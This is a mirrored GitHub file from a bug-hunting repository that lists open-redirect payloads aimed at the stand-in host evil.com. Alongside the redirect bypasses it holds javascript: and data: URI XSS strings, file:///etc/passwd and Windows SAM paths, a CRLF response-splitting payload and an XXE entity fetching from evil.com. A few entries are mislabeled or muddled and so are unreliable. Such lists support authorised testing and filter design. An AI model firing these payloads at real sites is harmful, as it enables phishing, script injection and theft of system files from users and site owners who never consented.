mirror of
https://github.com/0x5t4l1n/hunting.git
synced 2026-05-26 11:35:51 +00:00
copilot-swe-agent[bot]
ba72efbc5e
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
223 lines
4.7 KiB
Plaintext
223 lines
4.7 KiB
Plaintext
# Open Redirect Payloads
|
|
|
|
## Basic External URLs
|
|
http://evil.com
|
|
https://evil.com
|
|
//evil.com
|
|
///evil.com
|
|
////evil.com
|
|
http://evil.com/
|
|
https://evil.com/
|
|
//evil.com/
|
|
|
|
## Common Parameter Names to Test
|
|
?url=http://evil.com
|
|
?redirect=http://evil.com
|
|
?next=http://evil.com
|
|
?return=http://evil.com
|
|
?continue=http://evil.com
|
|
?destination=http://evil.com
|
|
?redir=http://evil.com
|
|
?returnTo=http://evil.com
|
|
?returnUrl=http://evil.com
|
|
?redirectUrl=http://evil.com
|
|
?redirect_uri=http://evil.com
|
|
?callback=http://evil.com
|
|
?return_to=http://evil.com
|
|
?goto=http://evil.com
|
|
?target=http://evil.com
|
|
?link=http://evil.com
|
|
?out=http://evil.com
|
|
?view=http://evil.com
|
|
?to=http://evil.com
|
|
?image_url=http://evil.com
|
|
?go=http://evil.com
|
|
?file=http://evil.com
|
|
?val=http://evil.com
|
|
?validate=http://evil.com
|
|
?domain=http://evil.com
|
|
?checkout_url=http://evil.com
|
|
?success=http://evil.com
|
|
?failure=http://evil.com
|
|
?login=http://evil.com
|
|
?logout=http://evil.com
|
|
|
|
## Protocol Manipulation
|
|
///evil.com
|
|
////evil.com
|
|
/////evil.com
|
|
\\evil.com
|
|
\\\\evil.com
|
|
\/\/evil.com
|
|
/\/\/evil.com
|
|
|
|
## Using @ Symbol
|
|
http://legitimate.com@evil.com
|
|
https://legitimate.com@evil.com
|
|
//legitimate.com@evil.com
|
|
http://legitimate.com%40evil.com
|
|
|
|
## URL Encoding
|
|
http%3A%2F%2Fevil.com
|
|
https%3A%2F%2Fevil.com
|
|
%2F%2Fevil.com
|
|
http%3A%2F%2Fevil%2Ecom
|
|
https%3A%2F%2Fevil%2Ecom
|
|
|
|
## Double URL Encoding
|
|
http%253A%252F%252Fevil.com
|
|
https%253A%252F%252Fevil.com
|
|
%252F%252Fevil.com
|
|
|
|
## Unicode/UTF-8 Encoding
|
|
http://evil%E3%80%82com
|
|
//evil%E3%80%82com
|
|
//evil%u2215com
|
|
//evil%u2216com
|
|
|
|
## Null Byte Bypass
|
|
http://evil.com%00.legitimate.com
|
|
https://evil.com%00.legitimate.com
|
|
//evil.com%00.legitimate.com
|
|
|
|
## Whitespace Bypass
|
|
http://evil.com%20
|
|
http://evil.com%09
|
|
http://evil.com%0a
|
|
http://evil.com%0d
|
|
|
|
## Using Localhost/Internal IPs
|
|
http://127.0.0.1
|
|
http://localhost
|
|
http://0.0.0.0
|
|
http://[::1]
|
|
http://2130706433 (decimal IP)
|
|
http://0x7f000001 (hex IP)
|
|
|
|
## Domain Manipulation
|
|
http://evil.com.legitimate.com
|
|
http://legitimate.com.evil.com
|
|
http://evil-legitimate.com
|
|
http://legitimate-evil.com
|
|
|
|
## Subdomain Takeover
|
|
http://subdomain.legitimate.com
|
|
//subdomain.legitimate.com
|
|
|
|
## XSS via Redirect (javascript: protocol)
|
|
javascript:alert(1)
|
|
javascript:alert('XSS')
|
|
javascript://evil.com%0Aalert(1)
|
|
javascript:eval(atob('YWxlcnQoMSk='))
|
|
|
|
## Data URI
|
|
data:text/html,<script>alert(1)</script>
|
|
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
|
|
|
|
## File Protocol
|
|
file:///etc/passwd
|
|
file://C:/Windows/System32/config/sam
|
|
|
|
## Wildcard Bypasses
|
|
http://evil*.com
|
|
http://*.evil.com
|
|
|
|
## Bypass using Backslash
|
|
http:\\evil.com
|
|
https:\\evil.com
|
|
|
|
## Using Question Mark
|
|
http://legitimate.com?evil.com
|
|
http://legitimate.com?@evil.com
|
|
|
|
## Using Hash
|
|
http://legitimate.com#evil.com
|
|
http://legitimate.com#@evil.com
|
|
|
|
## Bypass with Partial URL
|
|
evil.com
|
|
//evil.com
|
|
///evil.com
|
|
|
|
## Using Different TLDs
|
|
http://evil.co
|
|
http://evil.io
|
|
http://evil.net
|
|
http://evil.org
|
|
|
|
## CRLF Injection for Header Manipulation
|
|
%0d%0aLocation:%20http://evil.com
|
|
%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:text/html%0d%0aContent-Length:25%0d%0a%0d%0a<script>alert(1)</script>
|
|
%0aLocation:%20http://evil.com
|
|
|
|
## IPv6 Addresses
|
|
http://[::ffff:7f00:1]
|
|
http://[0:0:0:0:0:ffff:127.0.0.1]
|
|
|
|
## Punycode/IDN Homograph
|
|
http://xn--e1awd7f.com (example using Cyrillic characters)
|
|
http://xn--80a7a.com
|
|
|
|
## Using Subpaths
|
|
http://legitimate.com/redirect?url=http://evil.com
|
|
http://legitimate.com/redirect?url=//evil.com
|
|
http://legitimate.com/redirect?url=///evil.com
|
|
|
|
## Combined Techniques
|
|
http://legitimate.com@evil.com?redirect=http://evil.com
|
|
//legitimate.com@evil.com%2F
|
|
http://evil.com%23legitimate.com
|
|
http://evil.com%3Flegitimate.com
|
|
|
|
## Special Characters
|
|
http://evil。com (using Unicode dot)
|
|
http://evil。com (using full-width dot)
|
|
http://evil%E3%80%82com
|
|
|
|
## Bypass with URL Fragments
|
|
#http://evil.com
|
|
#//evil.com
|
|
|
|
## Using Meta Refresh
|
|
<meta http-equiv="refresh" content="0;url=http://evil.com">
|
|
|
|
## Mixed Case to Bypass Filters
|
|
HTtp://evil.com
|
|
HttPs://evil.com
|
|
hTTp://evil.com
|
|
|
|
## Decimal Encoding
|
|
http://1.2.3.4 (where 1.2.3.4 is the decimal representation)
|
|
|
|
## Octal Encoding
|
|
http://0177.0.0.01 (octal for 127.0.0.1)
|
|
|
|
## Using Port Numbers
|
|
http://evil.com:80
|
|
http://evil.com:443
|
|
http://evil.com:8080
|
|
|
|
## Path Confusion
|
|
/http://evil.com
|
|
\/http://evil.com
|
|
//http://evil.com
|
|
|
|
## Relative Path Manipulation
|
|
../../../evil.com
|
|
..%2F..%2F..%2Fevil.com
|
|
|
|
## Using Open Graph Protocol
|
|
http://legitimate.com/og?image=http://evil.com/image.jpg
|
|
|
|
## Flash-based Redirect
|
|
http://legitimate.com/flash.swf?url=http://evil.com
|
|
|
|
## PDF-based Redirect
|
|
http://legitimate.com/file.pdf#http://evil.com
|
|
|
|
## Using Referrer Header
|
|
Referer: http://evil.com
|
|
|
|
## XML External Entity (XXE) for Redirect
|
|
<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://evil.com">]><foo>&xxe;</foo>
|